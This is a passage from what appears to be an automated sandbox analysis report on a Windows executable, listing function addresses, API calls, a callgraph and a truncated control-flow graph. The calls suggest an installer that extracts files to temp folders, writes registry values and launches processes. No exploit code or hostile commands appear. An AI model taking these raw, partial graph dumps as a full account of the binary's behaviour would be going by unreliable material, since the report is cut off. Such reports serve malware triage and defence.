2521 7ff7600a4dcc 24 API calls 2518->2521 2522 7ff7600a6174 LocalFree 2519->2522 2523 7ff7600a618a 2519->2523 2524 7ff7600a613f LocalFree 2521->2524 2525 7ff7600a3123 2522->2525 2526 7ff7600a4dcc 24 API calls 2523->2526 2524->2525 2525->2294 2525->2297 2525->2301 2527 7ff7600a61ac LocalFree 2526->2527 2528 7ff7600a6100 2527->2528 2528->2525 2530 7ff7600a5050 7 API calls 2529->2530 2531 7ff7600a6001 2530->2531 2532 7ff7600a6006 2531->2532 2533 7ff7600a604a 2531->2533 2534 7ff7600a4dcc 24 API calls 2532->2534 2535 7ff7600a5050 7 API calls 2533->2535 2537 7ff7600a6025 2534->2537 2536 7ff7600a6063 2535->2536 2538 7ff7600a772c 13 API calls 2536->2538 2539 7ff7600a3146 2537->2539 2540 7ff7600a606f 2538->2540 2539->2301 2543 7ff7600a66c4 2539->2543 2540->2539 2541 7ff7600a6073 2540->2541 2542 7ff7600a4dcc 24 API calls 2541->2542 2542->2537 2544 7ff7600a5050 7 API calls 2543->2544 2545 7ff7600a6706 LocalAlloc 2544->2545 2546 7ff7600a6756 2545->2546 2547 7ff7600a6726 2545->2547 2549 7ff7600a5050 7 API calls 2546->2549 2548 7ff7600a4dcc 24 API calls 2547->2548 2550 7ff7600a6744 2548->2550 2551 7ff7600a6768 2549->2551 2755 7ff7600a7700 GetLastError 2550->2755 2552 7ff7600a67a5 lstrcmpA LocalFree 2551->2552 2553 7ff7600a676c 2551->2553 2558 7ff7600a67ec 2552->2558 2561 7ff7600a6837 2552->2561 2555 7ff7600a4dcc 24 API calls 2553->2555 2557 7ff7600a678a LocalFree 2555->2557 2556 7ff7600a6749 2559 7ff7600a674f 2556->2559 2557->2559 2566 7ff7600a64e4 53 API calls 2558->2566 2564 7ff7600a8470 7 API calls 2559->2564 2560 7ff7600a6b14 2562 7ff7600a7ac8 28 API calls 2560->2562 2561->2560 2563 7ff7600a684f GetTempPathA 2561->2563 2562->2559 2565 7ff7600a6872 2563->2565 2573 7ff7600a68a5 2563->2573 2567 7ff7600a3153 2564->2567 2731 7ff7600a64e4 2565->2731 2569 7ff7600a680c 2566->2569 2567->2301 2567->2307 2569->2559 2571 7ff7600a6814 2569->2571 2572 7ff7600a4dcc 24 API calls 2571->2572 2572->2556 2573->2559 2575 7ff7600a68f9 GetDriveTypeA 2573->2575 2576 7ff7600a6adb GetWindowsDirectoryA 2573->2576 2577 7ff7600a6916 GetFileAttributesA 2575->2577 2590 7ff7600a6911 2575->2590 2579 7ff7600a6ca4 38 API calls 2576->2579 2577->2590 2579->2573 2580 7ff7600a64e4 53 API calls 2580->2573 2581 7ff7600a6ca4 38 API calls 2581->2590 2582 7ff7600a6955 GetDiskFreeSpaceA 2584 7ff7600a6983 MulDiv 2582->2584 2582->2590 2583 7ff7600a2468 25 API calls 2583->2590 2584->2590 2585 7ff7600a6a02 GetWindowsDirectoryA 2585->2590 2586 7ff7600a7ba8 CharPrevA 2587 7ff7600a6a2a GetFileAttributesA 2586->2587 2588 7ff7600a6a40 CreateDirectoryA 2587->2588 2587->2590 2588->2590 2589 7ff7600a6a6d SetFileAttributesA 2589->2590 2590->2559 2590->2575 2590->2576 2590->2577 2590->2581 2590->2582 2590->2583 2590->2585 2590->2586 2590->2589 2591 7ff7600a64e4 53 API calls 2590->2591 2591->2590 2593 7ff7600a6d3f GetDiskFreeSpaceA 2592->2593 2594 7ff7600a6d12 2592->2594 2596 7ff7600a6d80 MulDiv 2593->2596 2597 7ff7600a6f63 memset 2593->2597 2595 7ff7600a4dcc 24 API calls 2594->2595 2598 7ff7600a6d2f 2595->2598 2596->2597 2600 7ff7600a6dae GetVolumeInformationA 2596->2600 2806 7ff7600a7700 GetLastError 2597->2806 2787 7ff7600a7700 GetLastError 2598->2787 2603 7ff7600a6de6 memset 2600->2603 2604 7ff7600a6e45 SetCurrentDirectoryA 2600->2604 2602 7ff7600a6f7b GetLastError FormatMessageA 2607 7ff7600a6fbd 2602->2607 2788 7ff7600a7700 GetLastError 2603->2788 2606 7ff7600a6e6c 2604->2606 2613 7ff7600a6eb4 2606->2613 2617 7ff7600a6ed8 2606->2617 2609 7ff7600a4dcc 24 API calls 2607->2609 2608 7ff7600a6dfe GetLastError FormatMessageA 2608->2607 2610 7ff7600a6fd8 SetCurrentDirectoryA 2609->2610 2616 7ff7600a6f41 2610->2616 2611 7ff7600a8470 7 API calls 2612 7ff7600a326f 2611->2612 2612->2301 2612->2315 2614 7ff7600a4dcc 24 API calls 2613->2614 2615 7ff7600a6d34 2614->2615 2615->2616 2616->2611 2617->2616 2789 7ff7600a24f8 2617->2789 2620 7ff7600a5050 7 API calls 2619->2620 2621 7ff7600a5dab FindResourceA LoadResource LockResource 2620->2621 2622 7ff7600a5fcf 2621->2622 2623 7ff7600a5dfc 2621->2623 2622->2334 2624 7ff7600a5e56 2623->2624 2625 7ff7600a5e08 GetDlgItem ShowWindow GetDlgItem ShowWindow 2623->2625 2807 7ff7600a5c60 #20 2624->2807 2625->2624 2628 7ff7600a5e5f 2633 7ff7600a4dcc 24 API calls 2628->2633 2629 7ff7600a5e69 #20 2629->2628 2630 7ff7600a5ed1 #22 2629->2630 2631 7ff7600a5f55 2630->2631 2632 7ff7600a5f15 #23 2630->2632 2635 7ff7600a5f61 FreeResource 2631->2635 2636 7ff7600a5f75 2631->2636 2632->2628 2632->2631 2634 7ff7600a5f53 2633->2634 2634->2631 2635->2636 2637 7ff7600a5f9f 2636->2637 2638 7ff7600a5f81 2636->2638 2637->2622 2639 7ff7600a5fb1 SendMessageA 2637->2639 2640 7ff7600a4dcc 24 API calls 2638->2640 2639->2622 2640->2637 2642 7ff7600a4118 2641->2642 2647 7ff7600a412f 2641->2647 2643 7ff7600a5050 7 API calls 2642->2643 2643->2647 2644 7ff7600a4145 memset 2644->2647 2645 7ff7600a4254 2646 7ff7600a4dcc 24 API calls 2645->2646 2683 7ff7600a4273 2646->2683 2647->2644 2647->2645 2651 7ff7600a42f5 CompareStringA 2647->2651 2652 7ff7600a45d8 2647->2652 2653 7ff7600a44ee 2647->2653 2655 7ff7600a4599 2647->2655 2656 7ff7600a44df LocalFree 2647->2656 2659 7ff7600a5050 7 API calls 2647->2659 2665 7ff7600a44ad LocalFree 2647->2665 2668 7ff7600a41fd CompareStringA 2647->2668 2684 7ff7600a4394 2647->2684 2819 7ff7600a1684 2647->2819 2858 7ff7600a1d28 memset memset RegCreateKeyExA 2647->2858 2885 7ff7600a473c CreateProcessA 2647->2885 2649 7ff7600a8470 7 API calls 2650 7ff7600a44ff 2649->2650 2650->2328 2651->2647 2651->2652 2652->2653 2654 7ff7600a45f2 RegOpenKeyExA 2652->2654 2653->2649 2654->2653 2658 7ff7600a4627 RegQueryValueExA 2654->2658 2657 7ff7600a4dcc 24 API calls 2655->2657 2656->2653 2661 7ff7600a45b8 LocalFree 2657->2661 2663 7ff7600a471c RegCloseKey 2658->2663 2664 7ff7600a466c memset GetSystemDirectoryA 2658->2664 2659->2647 2661->2653 2663->2653 2666 7ff7600a46b3 2664->2666 2667 7ff7600a469d 2664->2667 2665->2647 2665->2652 2671 7ff7600a114c _vsnprintf 2666->2671 2670 7ff7600a7ba8 CharPrevA 2667->2670 2668->2647 2670->2666 2672 7ff7600a46dc RegSetValueExA 2671->2672 2672->2663 2673 7ff7600a4574 2675 7ff7600a4dcc 24 API calls 2673->2675 2674 7ff7600a43a5 GetProcAddress 2676 7ff7600a4521 2674->2676 2674->2684 2678 7ff7600a4597 2675->2678 2679 7ff7600a4dcc 24 API calls 2676->2679 2680 7ff7600a4553 LocalFree 2678->2680 2681 7ff7600a4544 FreeLibrary 2679->2681 2910 7ff7600a7700 GetLastError 2680->2910 2681->2680 2683->2653 2684->2673 2684->2674 2685 7ff7600a4480 FreeLibrary 2684->2685 2686 7ff7600a44d3 FreeLibrary 2684->2686 2900 7ff7600a79f0 2684->2900 2685->2665 2686->2656 2688 7ff7600a5050 7 API calls 2687->2688 2689 7ff7600a3f8b LocalAlloc 2688->2689 2690 7ff7600a3fdd 2689->2690 2691 7ff7600a3fad 2689->2691 2693 7ff7600a5050 7 API calls 2690->2693 2692 7ff7600a4dcc 24 API calls 2691->2692 2694 7ff7600a3fcb 2692->2694 2695 7ff7600a3fef 2693->2695 2947 7ff7600a7700 GetLastError 2694->2947 2697 7ff7600a4030 lstrcmpA 2695->2697 2698 7ff7600a3ff3 2695->2698 2700 7ff7600a4098 LocalFree 2697->2700 2701 7ff7600a404e 2697->2701 2699 7ff7600a4dcc 24 API calls 2698->2699 2703 7ff7600a4011 LocalFree 2699->2703 2702 7ff7600a3139 2700->2702 2704 7ff7600a7ac8 28 API calls 2701->2704 2702->2294 2702->2301 2703->2702 2705 7ff7600a406e LocalFree 2704->2705 2705->2702 2706->2330 2708 7ff7600a778a 2707->2708 2709 7ff7600a114c _vsnprintf 2708->2709 2715 7ff7600a7803 FreeResource 2708->2715 2716 7ff7600a77b8 FreeResource 2708->2716 2710 7ff7600a77df FindResourceA 2709->2710 2711 7ff7600a7801 2710->2711 2712 7ff7600a775e LoadResource LockResource 2710->2712 2713 7ff7600a8470 7 API calls 2711->2713 2712->2708 2712->2711 2714 7ff7600a782e 2713->2714 2714->2318 2715->2711 2716->2708 2718 7ff7600a5050 7 API calls 2717->2718 2719 7ff7600a4967 LocalAlloc 2718->2719 2720 7ff7600a49a9 2719->2720 2721 7ff7600a4989 2719->2721 2722 7ff7600a5050 7 API calls 2720->2722 2723 7ff7600a4dcc 24 API calls 2721->2723 2724 7ff7600a49bb 2722->2724 2727 7ff7600a49a7 2723->2727 2725 7ff7600a49bf 2724->2725 2726 7ff7600a49d5 lstrcmpA 2724->2726 2729 7ff7600a4dcc 24 API calls 2725->2729 2726->2725 2728 7ff7600a4a0e LocalFree 2726->2728 2727->2301 2728->2727 2729->2728 2730->2528 2732 7ff7600a6516 2731->2732 2734 7ff7600a65dd 2731->2734 2762 7ff7600a63b8 2732->2762 2773 7ff7600a6b70 2734->2773 2735 7ff7600a6688 2737 7ff7600a8470 7 API calls 2735->2737 2740 7ff7600a66a8 2737->2740 2740->2559 2756 7ff7600a2468 GetWindowsDirectoryA 2740->2756 2741 7ff7600a662a CreateDirectoryA 2745 7ff7600a663f 2741->2745 2746 7ff7600a667d 2741->2746 2742 7ff7600a6649 2742->2735 2748 7ff7600a6ca4 38 API calls 2742->2748 2743 7ff7600a6577 GetSystemInfo 2753 7ff7600a6591 2743->2753 2744 7ff7600a65cc 2747 7ff7600a7ba8 CharPrevA 2744->2747 2745->2742 2785 7ff7600a7700 GetLastError 2746->2785 2747->2734 2751 7ff7600a665a 2748->2751 2750 7ff7600a7ba8 CharPrevA 2750->2744 2751->2735 2754 7ff7600a6666 RemoveDirectoryA 2751->2754 2752 7ff7600a6682 2752->2735 2753->2744 2753->2750 2754->2735 2755->2556 2757 7ff7600a24c4 2756->2757 2758 7ff7600a24a6 2756->2758 2760 7ff7600a8470 7 API calls 2757->2760 2759 7ff7600a4dcc 24 API calls 2758->2759 2759->2757 2761 7ff7600a24df 2760->2761 2761->2573 2761->2580 2764 7ff7600a63e3 2762->2764 2763 7ff7600a114c _vsnprintf 2763->2764 2764->2763 2765 7ff7600a7ba8 CharPrevA 2764->2765 2768 7ff7600a644b GetTempFileNameA 2764->2768 2766 7ff7600a6420 RemoveDirectoryA GetFileAttributesA 2765->2766 2766->2764 2767 7ff7600a64b6 CreateDirectoryA 2766->2767 2767->2768 2769 7ff7600a6490 2767->2769 2768->2769 2770 7ff7600a646b DeleteFileA CreateDirectoryA 2768->2770 2771 7ff7600a8470 7 API calls 2769->2771 2770->2769 2772 7ff7600a64a2 2771->2772 2772->2735 2772->2743 2772->2744 2774 7ff7600a6b8b 2773->2774 2774->2774 2775 7ff7600a6b94 LocalAlloc 2774->2775 2776 7ff7600a6bb4 2775->2776 2777 7ff7600a6bf5 2775->2777 2778 7ff7600a4dcc 24 API calls 2776->2778 2781 7ff7600a7ba8 CharPrevA 2777->2781 2779 7ff7600a6bd2 2778->2779 2782 7ff7600a6626 2779->2782 2786 7ff7600a7700 GetLastError 2779->2786 2783 7ff7600a6c14 CreateFileA LocalFree 2781->2783 2782->2741 2782->2742 2783->2779 2784 7ff7600a6c61 CloseHandle GetFileAttributesA 2783->2784 2784->2779 2785->2752 2786->2782 2787->2615 2788->2608 2790 7ff7600a2562 2789->2790 2791 7ff7600a2525 2789->2791 2793 7ff7600a2567 2790->2793 2794 7ff7600a25ab 2790->2794 2792 7ff7600a114c _vsnprintf 2791->2792 2795 7ff7600a253d 2792->2795 2796 7ff7600a114c _vsnprintf 2793->2796 2797 7ff7600a114c _vsnprintf 2794->2797 2805 7ff7600a255d 2794->2805 2799 7ff7600a4dcc 24 API calls 2795->2799 2800 7ff7600a257f 2796->2800 2802 7ff7600a25c7 2797->2802 2798 7ff7600a8470 7 API calls 2803 7ff7600a2609 2798->2803 2799->2805 2801 7ff7600a4dcc 24 API calls 2800->2801 2801->2805 2804 7ff7600a4dcc 24 API calls 2802->2804 2803->2616 2804->2805 2805->2798 2806->2602 2808 7ff7600a5ced 2807->2808 2818 7ff7600a5d62 2807->2818 2809 7ff7600a5380 29 API calls 2808->2809 2811 7ff7600a5d04 2809->2811 2810 7ff7600a8470 7 API calls 2812 7ff7600a5d78 2810->2812 2813 7ff7600a5d0d #21 2811->2813 2811->2818 2812->2628 2812->2629 2814 7ff7600a5d28 2813->2814 2813->2818 2815 7ff7600a5770 CloseHandle 2814->2815 2814->2818 2816 7ff7600a5d4a 2815->2816 2817 7ff7600a5d4f #23 2816->2817 2816->2818 2817->2818 2818->2810 2820 7ff7600a16d3 2819->2820 2911 7ff7600a15e8 2820->2911 2823 7ff7600a7ba8 CharPrevA 2825 7ff7600a1766 2823->2825 2824 7ff7600a7d68 2 API calls 2826 7ff7600a1811 2824->2826 2825->2824 2827 7ff7600a181a CompareStringA 2826->2827 2828 7ff7600a1a1b 2826->2828 2827->2828 2829 7ff7600a184d GetFileAttributesA 2827->2829 2830 7ff7600a7d68 2 API calls 2828->2830 2831 7ff7600a19f3 2829->2831 2832 7ff7600a1867 2829->2832 2833 7ff7600a1a28 2830->2833 2837 7ff7600a4dcc 24 API calls 2831->2837 2832->2831 2836 7ff7600a15e8 2 API calls 2832->2836 2834 7ff7600a1a31 CompareStringA 2833->2834 2835 7ff7600a1acb LocalAlloc 2833->2835 2834->2835 2842 7ff7600a1a60 2834->2842 2835->2831 2838 7ff7600a1aeb GetFileAttributesA 2835->2838 2839 7ff7600a188b 2836->2839 2856 7ff7600a194f 2837->2856 2849 7ff7600a1b01 2838->2849 2840 7ff7600a18b5 LocalAlloc 2839->2840 2843 7ff7600a15e8 2 API calls 2839->2843 2840->2831 2844 7ff7600a18d7 GetPrivateProfileIntA GetPrivateProfileStringA 2840->2844 2841 7ff7600a1bd1 2845 7ff7600a8470 7 API calls 2841->2845 2842->2842 2847 7ff7600a1a81 LocalAlloc 2842->2847 2843->2840 2848 7ff7600a1984 2844->2848 2844->2856 2846 7ff7600a1be9 2845->2846 2846->2647 2847->2831 2852 7ff7600a1ab2 2847->2852 2850 7ff7600a1995 GetShortPathNameA 2848->2850 2851 7ff7600a19ba 2848->2851 2857 7ff7600a1b54 2849->2857 2850->2851 2855 7ff7600a114c _vsnprintf 2851->2855 2854 7ff7600a114c _vsnprintf 2852->2854 2854->2856 2855->2856 2856->2841 2919 7ff7600a2a6c 2857->2919 2859 7ff7600a2019 2858->2859 2860 7ff7600a1dce 2858->2860 2861 7ff7600a8470 7 API calls 2859->2861 2863 7ff7600a114c _vsnprintf 2860->2863 2865 7ff7600a1e25 2860->2865 2862 7ff7600a2028 2861->2862 2862->2647 2864 7ff7600a1dee RegQueryValueExA 2863->2864 2864->2860 2864->2865 2866 7ff7600a1e46 GetSystemDirectoryA 2865->2866 2867 7ff7600a1e29 RegCloseKey 2865->2867 2868 7ff7600a7ba8 CharPrevA 2866->2868 2867->2859 2869 7ff7600a1e6a LoadLibraryA 2868->2869 2870 7ff7600a1e86 GetProcAddress FreeLibrary 2869->2870 2871 7ff7600a1f55 GetModuleFileNameA 2869->2871 2870->2871 2872 7ff7600a1ebe GetSystemDirectoryA 2870->2872 2873 7ff7600a1f78 RegCloseKey 2871->2873 2876 7ff7600a1ee8 2871->2876 2874 7ff7600a1ed5 2872->2874 2872->2876 2873->2859 2875 7ff7600a7ba8 CharPrevA 2874->2875 2875->2876 2876->2876 2877 7ff7600a1f11 LocalAlloc 2876->2877 2878 7ff7600a1f35 2877->2878 2879 7ff7600a1f8e 2877->2879 2880 7ff7600a4dcc 24 API calls 2878->2880 2881 7ff7600a114c _vsnprintf 2879->2881 2882 7ff7600a1f53 2880->2882 2883 7ff7600a1fc4 2881->2883 2882->2873 2883->2883 2884 7ff7600a1fcd RegSetValueExA RegCloseKey LocalFree 2883->2884 2884->2859 2886 7ff7600a47c2 WaitForSingleObject GetExitCodeProcess 2885->2886 2887 7ff7600a48b3 2885->2887 2892 7ff7600a47f9 2886->2892 2946 7ff7600a7700 GetLastError 2887->2946 2889 7ff7600a48b8 GetLastError FormatMessageA 2890 7ff7600a4dcc 24 API calls 2889->2890 2893 7ff7600a491c 2890->2893 2894 7ff7600a2318 18 API calls 2892->2894 2899 7ff7600a482a CloseHandle CloseHandle 2892->2899 2896 7ff7600a8470 7 API calls 2893->2896 2897 7ff7600a484d 2894->2897 2895 7ff7600a48aa 2895->2893 2898 7ff7600a492f 2896->2898 2897->2899 2898->2647 2899->2893 2899->2895 2901 7ff7600a7a25 2900->2901 2902 7ff7600a7ba8 CharPrevA 2901->2902 2903 7ff7600a7a63 GetFileAttributesA 2902->2903 2904 7ff7600a7a96 LoadLibraryA 2903->2904 2905 7ff7600a7a79 2903->2905 2907 7ff7600a7aa9 2904->2907 2905->2904 2906 7ff7600a7a7d LoadLibraryExA 2905->2906 2906->2907 2908 7ff7600a8470 7 API calls 2907->2908 2909 7ff7600a7ab9 2908->2909 2909->2684 2910->2683 2912 7ff7600a1609 2911->2912 2914 7ff7600a1621 2912->2914 2916 7ff7600a1651 2912->2916 2932 7ff7600a7ce8 2912->2932 2915 7ff7600a7ce8 2 API calls 2914->2915 2917 7ff7600a162f 2915->2917 2916->2823 2916->2825 2917->2916 2918 7ff7600a7ce8 2 API calls 2917->2918 2918->2917 2920 7ff7600a2aa0 GetModuleFileNameA 2919->2920 2921 7ff7600a2c24 2919->2921 2920->2921 2931 7ff7600a2ac8 2920->2931 2922 7ff7600a8470 7 API calls 2921->2922 2924 7ff7600a2c37 2922->2924 2923 7ff7600a2acc IsDBCSLeadByte 2923->2931 2924->2841 2925 7ff7600a2af1 CharNextA CharUpperA 2928 7ff7600a2b9b CharUpperA 2925->2928 2925->2931 2926 7ff7600a2bf6 CharNextA 2927 7ff7600a2c08 CharNextA 2926->2927 2927->2921 2927->2923 2928->2931 2930 7ff7600a2b36 CharPrevA 2930->2931 2931->2923 2931->2925 2931->2926 2931->2927 2931->2930 2937 7ff7600a7c40 2931->2937 2933 7ff7600a7d00 2932->2933 2934 7ff7600a7d0a IsDBCSLeadByte 2933->2934 2935 7ff7600a7d47 2933->2935 2936 7ff7600a7d30 CharNextA 2933->2936 2934->2933 2934->2935 2935->2912 2936->2933 2938 7ff7600a7c58 2937->2938 2938->2938 2939 7ff7600a7c61 CharPrevA 2938->2939 2940 7ff7600a7c7d CharPrevA 2939->2940 2941 7ff7600a7c94 2940->2941 2942 7ff7600a7c75 2940->2942 2943 7ff7600a7cc7 2941->2943 2944 7ff7600a7cb5 CharNextA 2941->2944 2945 7ff7600a7c9e CharPrevA 2941->2945 2942->2940 2942->2941 2943->2931 2944->2943 2945->2943 2945->2944 2946->2889 2947->2702 2949 7ff7600a2281 2948->2949 2950 7ff7600a22eb 2948->2950 2951 7ff7600a7ba8 CharPrevA 2949->2951 2952 7ff7600a8470 7 API calls 2950->2952 2953 7ff7600a2294 WritePrivateProfileStringA _lopen 2951->2953 2954 7ff7600a22fd 2952->2954 2953->2950 2955 7ff7600a22c7 _llseek _lclose 2953->2955 2954->2358 2955->2950 3103 7ff7600a8417 3104 7ff7600a842f 3103->3104 3105 7ff7600a8426 _exit 3103->3105 3106 7ff7600a8444 3104->3106 3107 7ff7600a8438 _cexit 3104->3107 3105->3104 3107->3106

                                                                                                                                                                                                                                                                                                                Callgraph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                • Opacity -> Relevance
                                                                                                                                                                                                                                                                                                                • Disassembly available
                                                                                                                                                                                                                                                                                                                callgraph 0 Function_00007FF7600A3530 11 Function_00007FF7600A7BA8 0->11 16 Function_00007FF7600A6CA4 0->16 36 Function_00007FF7600A4DCC 0->36 49 Function_00007FF7600A6B70 0->49 59 Function_00007FF7600A4C68 0->59 66 Function_00007FF7600A4A60 0->66 1 Function_00007FF7600A4A30 2 Function_00007FF7600A58B0 14 Function_00007FF7600A512C 2->14 20 Function_00007FF7600A5B18 2->20 46 Function_00007FF7600A51BC 2->46 48 Function_00007FF7600A5770 2->48 53 Function_00007FF7600A8470 2->53 83 Function_00007FF7600A5380 2->83 94 Function_00007FF7600A527C 2->94 3 Function_00007FF7600A78B0 3->11 3->53 4 Function_00007FF7600A8930 5 Function_00007FF7600A8B30 6 Function_00007FF7600A81B0 7 Function_00007FF7600A2DB4 12 Function_00007FF7600A70A8 7->12 26 Function_00007FF7600A5050 7->26 31 Function_00007FF7600A7AC8 7->31 33 Function_00007FF7600A204C 7->33 7->36 7->53 56 Function_00007FF7600A3BF4 7->56 65 Function_00007FF7600A12EC 7->65 8 Function_00007FF7600A7E34 9 Function_00007FF7600A2834 23 Function_00007FF7600A261C 9->23 10 Function_00007FF7600A1D28 10->11 34 Function_00007FF7600A114C 10->34 10->36 10->53 91 Function_00007FF7600A1084 11->91 12->11 18 Function_00007FF7600A7024 12->18 32 Function_00007FF7600A8648 12->32 12->36 12->53 57 Function_00007FF7600A7D68 12->57 60 Function_00007FF7600A7CE8 12->60 13 Function_00007FF7600A772C 13->34 13->53 81 Function_00007FF7600A1008 14->81 14->91 15 Function_00007FF7600A33A0 16->36 16->53 84 Function_00007FF7600A7700 16->84 93 Function_00007FF7600A24F8 16->93 17 Function_00007FF7600A60A4 17->26 17->36 17->84 19 Function_00007FF7600A2318 43 Function_00007FF7600A2244 19->43 21 Function_00007FF7600A8417 22 Function_00007FF7600A8818 47 Function_00007FF7600A87BC 22->47 23->11 23->53 23->81 24 Function_00007FF7600A8A9C 25 Function_00007FF7600A7850 27 Function_00007FF7600A80D0 27->22 54 Function_00007FF7600A8870 27->54 28 Function_00007FF7600A8750 29 Function_00007FF7600A88D0 29->4 89 Function_00007FF7600A8880 29->89 30 Function_00007FF7600A2C54 30->7 30->19 30->36 62 Function_00007FF7600A61EC 30->62 63 Function_00007FF7600A30EC 30->63 82 Function_00007FF7600A1C0C 30->82 31->36 80 Function_00007FF7600A8494 32->80 33->11 33->33 33->53 33->91 35 Function_00007FF7600A494C 35->26 35->36 36->8 36->34 36->53 36->81 92 Function_00007FF7600A7F04 36->92 37 Function_00007FF7600A11CC 37->53 38 Function_00007FF7600A7C40 39 Function_00007FF7600A3840 39->59 40 Function_00007FF7600A3B40 41 Function_00007FF7600A66C4 41->11 41->16 41->26 41->31 41->36 41->53 58 Function_00007FF7600A2468 41->58 72 Function_00007FF7600A64E4 41->72 41->84 42 Function_00007FF7600A40C4 42->10 42->11 42->26 42->34 42->36 45 Function_00007FF7600A473C 42->45 52 Function_00007FF7600A79F0 42->52 42->53 42->84 90 Function_00007FF7600A1684 42->90 43->11 43->53 44 Function_00007FF7600A63B8 44->11 44->34 44->53 44->81 45->19 45->36 45->53 45->84 46->31 49->11 49->36 49->81 49->84 50 Function_00007FF7600A5870 51 Function_00007FF7600A33F0 51->59 52->11 52->53 53->80 55 Function_00007FF7600A3F74 55->26 55->31 55->36 55->84 56->8 56->9 56->36 56->53 56->92 58->36 58->53 59->53 61 Function_00007FF7600A15E8 61->60 62->33 62->38 62->53 63->11 63->13 63->16 63->17 63->19 63->31 63->35 63->36 63->41 63->42 63->53 63->55 73 Function_00007FF7600A5FE4 63->73 76 Function_00007FF7600A5D90 63->76 63->84 64 Function_00007FF7600A2A6C 64->38 64->53 64->81 65->37 65->53 66->36 66->81 67 Function_00007FF7600A5C60 67->48 67->53 67->83 68 Function_00007FF7600A55E0 69 Function_00007FF7600A57E0 70 Function_00007FF7600A8A62 70->24 71 Function_00007FF7600A8B60 72->11 72->16 72->44 72->49 72->53 72->84 73->13 73->26 73->36 74 Function_00007FF7600A8964 75 Function_00007FF7600A5690 75->40 76->26 76->36 76->67 77 Function_00007FF7600A3910 77->36 77->40 77->59 78 Function_00007FF7600A8790 79 Function_00007FF7600A8910 82->36 82->53 83->36 85 Function_00007FF7600A1500 85->53 85->59 86 Function_00007FF7600A7E00 87 Function_00007FF7600A8802 88 Function_00007FF7600A8200 88->29 88->30 88->74 90->11 90->34 90->36 90->53 90->57 90->61 90->64 90->81 90->91 92->53 93->34 93->36 93->53 94->36 94->81

                                                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                                                Function 00007FF7600A40C4 Relevance: 52.9, APIs: 17, Strings: 13, Instructions: 371libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                                                control_flow_graph 0 7ff7600a40c4-7ff7600a4116 1 7ff7600a4118-7ff7600a4133 call 7ff7600a5050 0->1 2 7ff7600a4139-7ff7600a4141 0->2 1->2 9 7ff7600a4254-7ff7600a427d call 7ff7600a4dcc 1->9 4 7ff7600a4145-7ff7600a4167 memset 2->4 6 7ff7600a4282-7ff7600a4295 4->6 7 7ff7600a416d-7ff7600a4188 call 7ff7600a5050 4->7 8 7ff7600a4299-7ff7600a42a3 6->8 7->9 18 7ff7600a418e-7ff7600a4194 7->18 12 7ff7600a42a5-7ff7600a42ab 8->12 13 7ff7600a42b7-7ff7600a42c2 8->13 19 7ff7600a44ee 9->19 12->13 16 7ff7600a42ad-7ff7600a42b5 12->16 17 7ff7600a42c5-7ff7600a42c8 13->17 16->8 16->13 20 7ff7600a4328-7ff7600a433d call 7ff7600a1684 17->20 21 7ff7600a42ca-7ff7600a42e2 call 7ff7600a5050 17->21 22 7ff7600a4196-7ff7600a419b 18->22 23 7ff7600a419d-7ff7600a41a0 18->23 24 7ff7600a44f0-7ff7600a451f call 7ff7600a8470 19->24 20->19 35 7ff7600a4343-7ff7600a434a 20->35 21->9 38 7ff7600a42e8-7ff7600a42ef 21->38 26 7ff7600a41b5 22->26 27 7ff7600a41a2-7ff7600a41ab 23->27 28 7ff7600a41ad-7ff7600a41af 23->28 31 7ff7600a41b8-7ff7600a41bb 26->31 27->26 30 7ff7600a41b1 28->30 28->31 30->26 31->17 36 7ff7600a41c1-7ff7600a41cb 31->36 39 7ff7600a436a-7ff7600a436c 35->39 40 7ff7600a434c-7ff7600a4353 35->40 41 7ff7600a4231-7ff7600a4234 36->41 42 7ff7600a41cd-7ff7600a41d0 36->42 43 7ff7600a42f5-7ff7600a4322 CompareStringA 38->43 44 7ff7600a45d8-7ff7600a45df 38->44 50 7ff7600a4372-7ff7600a4379 39->50 51 7ff7600a4493-7ff7600a449b 39->51 40->39 45 7ff7600a4355-7ff7600a435c 40->45 41->20 52 7ff7600a423a-7ff7600a4252 call 7ff7600a5050 41->52 46 7ff7600a41d2-7ff7600a41d9 42->46 47 7ff7600a41db-7ff7600a41dd 42->47 43->20 43->44 48 7ff7600a45e5-7ff7600a45ec 44->48 49 7ff7600a472d-7ff7600a472f 44->49 45->39 53 7ff7600a435e-7ff7600a4360 45->53 54 7ff7600a41ea-7ff7600a41fb call 7ff7600a5050 46->54 47->19 55 7ff7600a41e3 47->55 48->49 56 7ff7600a45f2-7ff7600a4621 RegOpenKeyExA 48->56 49->24 57 7ff7600a437f-7ff7600a4381 50->57 58 7ff7600a4599-7ff7600a45d3 call 7ff7600a4dcc LocalFree 50->58 59 7ff7600a44df-7ff7600a44e9 LocalFree 51->59 60 7ff7600a449d-7ff7600a44a4 call 7ff7600a473c 51->60 52->9 52->17 53->50 63 7ff7600a4362-7ff7600a4365 call 7ff7600a1d28 53->63 54->9 79 7ff7600a41fd-7ff7600a422d CompareStringA 54->79 55->54 56->49 64 7ff7600a4627-7ff7600a4666 RegQueryValueExA 56->64 57->51 66 7ff7600a4387-7ff7600a438e 57->66 58->19 59->19 69 7ff7600a44a9-7ff7600a44ab 60->69 63->39 72 7ff7600a471c-7ff7600a4728 RegCloseKey 64->72 73 7ff7600a466c-7ff7600a469b memset GetSystemDirectoryA 64->73 66->51 75 7ff7600a4394-7ff7600a439f call 7ff7600a79f0 66->75 69->59 76 7ff7600a44ad-7ff7600a44c3 LocalFree 69->76 72->49 77 7ff7600a46b3-7ff7600a46dc call 7ff7600a114c 73->77 78 7ff7600a469d-7ff7600a46ae call 7ff7600a7ba8 73->78 86 7ff7600a4574-7ff7600a4597 call 7ff7600a4dcc 75->86 87 7ff7600a43a5-7ff7600a43c1 GetProcAddress 75->87 76->44 81 7ff7600a44c9-7ff7600a44ce 76->81 89 7ff7600a46e3-7ff7600a46ea 77->89 78->77 79->41 81->4 99 7ff7600a4553-7ff7600a456f LocalFree call 7ff7600a7700 86->99 90 7ff7600a4521-7ff7600a454e call 7ff7600a4dcc FreeLibrary 87->90 91 7ff7600a43c7-7ff7600a4415 87->91 89->89 92 